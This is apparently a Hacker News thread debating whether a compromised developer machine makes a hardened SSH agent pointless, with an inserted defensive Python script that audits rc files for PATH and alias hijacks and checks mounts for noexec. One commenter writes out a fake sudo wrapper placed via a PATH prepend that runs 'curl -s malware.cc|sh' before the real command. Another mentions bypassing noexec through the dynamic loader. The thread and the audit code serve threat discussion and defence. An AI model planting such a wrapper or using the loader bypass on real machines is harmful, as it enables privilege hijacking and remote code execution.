mr_mitm 6 hours ago

I can type up a test case on my phone:

The malware puts this in your bashrc or equivalent:

    PATH=/tmp/malware/bin:$PATH

In /tmp/malware/bin/sudo:

    #!/bin/bash
    /sbin/sudo bash -c "curl -s malware.cc|sh && $@"

You get the idea. It can do something similar to the git binary and hijack "git commit" such that it will amend whatever it wants and you will happily sign it and push it using your hardened SSH agent.

You say it's unlikely, fine, so your risk appetite is sufficiently high. I just want to highlight the risk.

If your machine is compromised, it's game over.

otterley 6 hours ago | parent

Typical defense against this is to mount all user-writable filesystems as `noexec` but unfortunately most OSes don't do that out of the box.
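A read-only check a defender could run against the two points raised so far (the PATH prepend and alias/function hijack of sudo or git in mr_mitm's post, and the `noexec` mount mitigation in otterley's reply). This is an added example, not code from any commenter; the sample `.bashrc` text and `/proc/mounts` excerpt are constructed, and the list of "sensitive" command names and "system" directories are assumptions to adjust per host.

```python
"""Read-only audit for PATH-prepend and alias hijacks of sensitive commands,
plus a check of which watched mount points lack the noexec option.

Added example; not code from any commenter in the thread. Sample rc text
and mount lines below are constructed for illustration.
"""
import os
import re
import shutil
import stat

# Assumed lists: commands worth protecting and where their real binaries live.
SENSITIVE = ("sudo", "git", "ssh", "ssh-add", "gpg")
SYSTEM_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

PATH_RE = re.compile(r'^\s*(?:export\s+)?PATH=(?P<value>[^\n#]+)', re.M)
ALIAS_RE = re.compile(r'^\s*alias\s+(?P<name>[\w-]+)=(?P<target>.+)$', re.M)
FUNC_RE = re.compile(r'^\s*(?:function\s+)?(?P<name>[\w-]+)\s*\(\)\s*\{', re.M)

# Constructed sample ~/.bashrc: one benign PATH line, one /tmp prepend as in
# the thread, one alias and one shell function wrapping sensitive commands.
SAMPLE_BASHRC = """\
export PATH=/usr/local/bin:$PATH
PATH=/tmp/malware/bin:$PATH
alias ll='ls -l'
alias sudo='sudo '
git() { command git "$@"; }
"""

# Constructed /proc/mounts excerpt: /tmp carries noexec, /home does not.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
"""


def path_entries(rc_text):
    """Return every directory named in PATH= assignments, in file order."""
    entries = []
    for m in PATH_RE.finditer(rc_text):
        value = m.group("value").strip().strip('"\'')
        for part in value.split(":"):
            if part and part not in ("$PATH", "${PATH}"):
                entries.append(part)
    return entries


def suspicious_path_entries(rc_text):
    """Flag PATH entries under a temp directory or writable by non-admins."""
    findings = []
    for d in path_entries(rc_text):
        expanded = os.path.expandvars(os.path.expanduser(d))
        if expanded.startswith(TEMP_DIRS):
            findings.append((d, "temp directory"))
        elif os.path.isdir(expanded):
            if os.stat(expanded).st_mode & stat.S_IWOTH:
                findings.append((d, "world-writable"))
            elif os.access(expanded, os.W_OK) and not expanded.startswith(SYSTEM_DIRS):
                findings.append((d, "writable by current user"))
    return findings


def shadowed_commands(rc_text, names=SENSITIVE):
    """List sensitive command names redefined by an alias or shell function."""
    findings = []
    for m in ALIAS_RE.finditer(rc_text):
        if m.group("name") in names:
            findings.append((m.group("name"), "alias", m.group("target").strip()))
    for m in FUNC_RE.finditer(rc_text):
        if m.group("name") in names:
            findings.append((m.group("name"), "function", ""))
    return findings


def resolved_outside_system_dirs(names=SENSITIVE, path=None):
    """Map each name whose PATH lookup lands outside SYSTEM_DIRS to that path."""
    out = {}
    for n in names:
        found = shutil.which(n, path=path)
        if found and not os.path.realpath(found).startswith(SYSTEM_DIRS):
            out[n] = found
    return out


def mounts_lacking_noexec(mounts_text, watch=("/tmp", "/var/tmp", "/dev/shm", "/home")):
    """Return watched mount points mounted without noexec (/proc/mounts format)."""
    missing = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mountpoint, options = fields[1], fields[3].split(",")
        if mountpoint in watch and "noexec" not in options:
            missing.append(mountpoint)
    return missing


if __name__ == "__main__":
    print("suspicious PATH entries:", suspicious_path_entries(SAMPLE_BASHRC))
    print("redefined commands:", shadowed_commands(SAMPLE_BASHRC))
    print("resolved outside system dirs:", resolved_outside_system_dirs())
    print("mounts without noexec:", mounts_lacking_noexec(SAMPLE_MOUNTS))
```

The checks are deliberately noisy rather than clever: `alias sudo='sudo '` is a common benign idiom and package managers that install under non-standard prefixes will show up in the resolution check, so treat every finding as something to review rather than as a verdict. To run it against a real host, feed the contents of the user's rc files and `/proc/mounts` to the same functions instead of the constructed samples.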

mr_mitm 6 hours ago | parent

It could have created a bash alias then. And I don't think a dev wants to be restricted in creating executables. Again, if a dev can do it, so can the malware.

dividuum 4 hours ago | parent

I remember you could trivially circumvent that with "/lib/ld-linux.so <executable>". Does that no longer work?

LtWorf 2 hours ago | parent

Kinda hard to work as a software developer then.